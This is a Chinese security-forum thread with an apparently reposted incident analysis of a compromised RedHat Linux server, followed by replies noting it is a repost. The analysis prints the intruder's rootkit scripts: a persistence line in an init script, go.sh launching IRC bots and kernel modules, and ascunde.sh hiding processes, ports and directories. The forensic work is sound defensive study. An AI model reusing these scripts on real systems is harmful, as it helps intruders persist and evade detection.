|
 | 作者: biyuntian [biyuntian]
 论坛用户 |
登录 |
| 一、意外 时间:2001-3-11下午 地点:某台RedHat Linux机器: #uname -a Linux *.*.cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown 俺习惯性地先进到/etc/rc.d/init.d,看了一下,马上发现异状: #ls -la …… -rwxr-xr-x 1 root root 2775 Mar 26 1999 netfs -rwxr-xr-x 1 root root 5537 Mar 3 21:23 network -rwxr-xr-x 1 root root 2408 Apr 16 1999 nfs …… 二、初步检查 明显是个新手干的嘛,network文件被人动过了,咱们用stat命令看看先: #stat network File: "network" Size: 5537 Filetype: Regular File Mode: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Device: 3,1 Inode: 269454 Links: 1 Access: Sun Mar 11 10:59:59 2001(00000.05:53:41) Modify: Sun Mar 4 05:23:41 2001(00007.11:29:59) Change: Sun Mar 4 05:23:41 2001(00007.11:29:59)最后被人改动的时间是3月4号的凌晨。让我们来看看他往文件里加了什么吧: #cat network …… /usr/lib/libdd.so.1 就是这么一句,加在文件末尾,看来的确是手段不甚高明。瞧瞧这是个什么文件先 #file /usr/lib/libdd.so.1 /usr/lib/libdd.so.1: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped 哦,是个二进制的可执行文件,执行下strings看是否眼熟 :) #strings /usr/lib/libdd.so.1 /lib/ld-linux.so.2 __gmon_start__ libc.so.6 system __deregister_frame_info _IO_stdin_used __libc_start_main __register_frame_info GLIBC_2.0 PTRh /boot/.pty0/go.sh <--------这条信息看上去比较有趣 哦,这就简单了嘛,俺看看这里面的路径: #cd /boot/.pty0 #cat go.sh #!/bin/bash f=`ls -al /boot | grep .pty0` if [ -n "$f" ]; then cd /boot/.pty0 ./mcd -q cd mech1 ./mech -f conf 1>/dev/null 2>/dev/null cd .. cd mech2 ./mech -f conf 1>/dev/null 2>/dev/null cd .. cd mech3 ./mech -f conf 1>/dev/null 2>/dev/null cd .. /sbin/insmod paraport.o 1>/dev/null 2>/dev/null /sbin/insmod iBCS.o 1>/dev/null 2>/dev/null ./ascunde.sh fi 有点晕,看不明白mcd、mech这些东西是干嘛用的,再看一下下一个脚本是什么: #cat ascunde.sh #!/bin/bash for proces in `/bin/cat /boot/.pty0/hdm`; do P=`/sbin/pidof $proces` if [ -n "$P" ]; then killall -31 $proces 1>/dev/hdm 2>/dev/hdm fi done for port in `/bin/cat /boot/.pty0/hdm1`; do ./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm done for director in `/bin/cat /boot/.pty0/hdm2`; do ./hidef $director 1>/dev/hdm 2>/dev/hdm done 看到这里,事情开始有趣了,这似乎不是一个三流的script kiddle干的活嘛,打个包拖回来先,于是俺 #cd /boot #ls -la total 2265 drwxr-xr-x 3 root root 1024 Mar 11 03:01 . drwxr-xr-x 21 root root 1024 Mar 2 03:37 .. lrwxrwxrwx 1 root root 19 Sep 26 1999 System.map -> System.map-2.2.5-15 -rw-r--r-- 1 root root 186704 Apr 20 1999 System.map-2.2.5-15 -rw-r--r-- 1 root root 512 Sep 26 1999 boot.0300 -rw-r--r-- 1 root root 4544 Apr 13 1999 boot.b -rw-r--r-- 1 root root 612 Apr 13 1999 chain.b -rw------- 1 root root 9728 Sep 26 1999 map lrwxrwxrwx 1 root root 20 Sep 26 1999 module-info -> module-info-2.2.5-15 -rw-r--r-- 1 root root 11773 Apr 20 1999 module-info-2.2.5-15 -rw-r--r-- 1 root root 620 Apr 13 1999 os2_d.b -rwxr-xr-x 1 root root 1469282 Apr 20 1999 vmlinux-2.2.5-15 lrwxrwxrwx 1 root root 16 Sep 26 1999 vmlinuz -> vmlinuz-2.2.5-15 -rw-r--r-- 1 root root 617288 Apr 20 1999 vmlinuz-2.2.5-15 咦,事情更有趣了……居然没有看到.pty0的目录 #cd .pty0 #ls -laF total 1228 drwxr-xr-x 3 root root 1024 Mar 11 03:01 ../ -rwxr-xr-x 1 root root 345 Mar 3 21:23 ascunde.sh* -rwxr-xr-x 1 root root 12760 Mar 3 21:23 dec2hex* -rwxr-xr-x 1 root root 13414 Mar 3 21:23 ered* -rwxr-xr-x 1 root root 358 Mar 7 19:03 go.sh* -rwxr-xr-x 1 root root 3872 Mar 3 21:23 hidef* -rw-r--r-- 1 root root 956 Mar 3 21:23 iBCS.o -rw-r--r-- 1 root root 524107 Mar 7 18:40 m.tgz -rwxr-xr-x 1 root root 656111 Mar 3 21:23 mcd* drwxr-xr-x 4 root root 1024 Mar 7 19:00 mech1/ drwxr-xr-x 4 root root 1024 Mar 9 19:50 mech2/ drwxr-xr-x 4 root root 1024 Mar 9 19:20 mech3/ -rwxr-xr-x 1 root root 12890 Mar 3 21:23 nethide* -rw-r--r-- 1 root root 10948 Mar 3 21:23 paraport.o -rw-r--r-- 1 root root 522 Mar 3 21:23 ssh_host_key -rw------- 1 root root 512 Mar 11 04:16 ssh_random_seed -rw-r--r-- 1 root root 677 Mar 3 21:23 sshd_config 看来是加载了某个lkm了,比较讨厌。 #/sbin/lsmod Module Size Used by nfsd 150936 8 (autoclean) lockd 30856 1 (autoclean) [nfsd] sunrpc 52356 1 (autoclean) [nfsd lockd] 3c59x 18920 1 (autoclean) 这些是正常的lkm么?前三个模块跟rpc有关,不知开了哪些rpc服务 #/usr/sbin/rpcinfo -p localhost program vers proto port 100000 2 tcp 111 rpcbind 100024 1 tcp 664 status 100011 1 udp 673 rquotad 100005 3 tcp 695 mountd 100003 2 udp 2049 nfs 100021 3 tcp 1024 nlockmgr 原来如此,难怪会被入侵,该开的全开了。不过也证明了nfsd,lockd,sunrpc这三个模块没问题了。 再来看看网卡吧,3c59x是网卡的驱动模块。 #/sbin/ifconfig -a /sbin/ifconfig -a lo Link encap:Local Loopback inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:3924 Metric:1 RX packets:380640 errors:3374 dropped:0 overruns:0 TX packets:0 errors:0 dropped:0 overruns:380640 eth0 Link encap:10Mbps Ethernet HWaddr 00:10:5A:63:5B:05 inet addr:*.*.*.* Bcast:*.*.*.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:71144611 errors:820101 dropped:0 overruns:0 TX packets:0 errors:0 dropped:0 overruns:436037129 Interrupt:10 Base address:0xe400 #dmesg|grep eth0 eth0: 3Com 3c905B Cyclone 100baseTx at 0xe400, 00:10:5a:63:5b:05, IRQ 10 eth0: Setting promiscuous mode. device eth0 entered promiscuous mode 看来这些模块都是正常的,但比较狠的就是――device eth0 entered promiscuous mode――看来这入侵者架了sniffer开听了,但关键是现在这个入侵者加载了个俺看不到的家伙,有些晕了……咦,对了,看看文件名先…… |
| 地主 发表时间: 04/23 04:45 |
 | 回复: xiaojun [xiaojun]  剑客 |
登录 |
|
我靠!还以为是你的大作呢?原来是转的!转还转重了。你去UNIX系统看看夜色撩人那篇入侵分析,与你这有啥不同。嘿,悠着点啊!……… |
| B1层 发表时间: 04/23 09:08 |
| 回复: 54183710 [hcz]  论坛用户 |
登录 |
|
我好象几年前就看到了这篇文章了 |
| B2层 发表时间: 04/26 17:23 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 入侵分析 1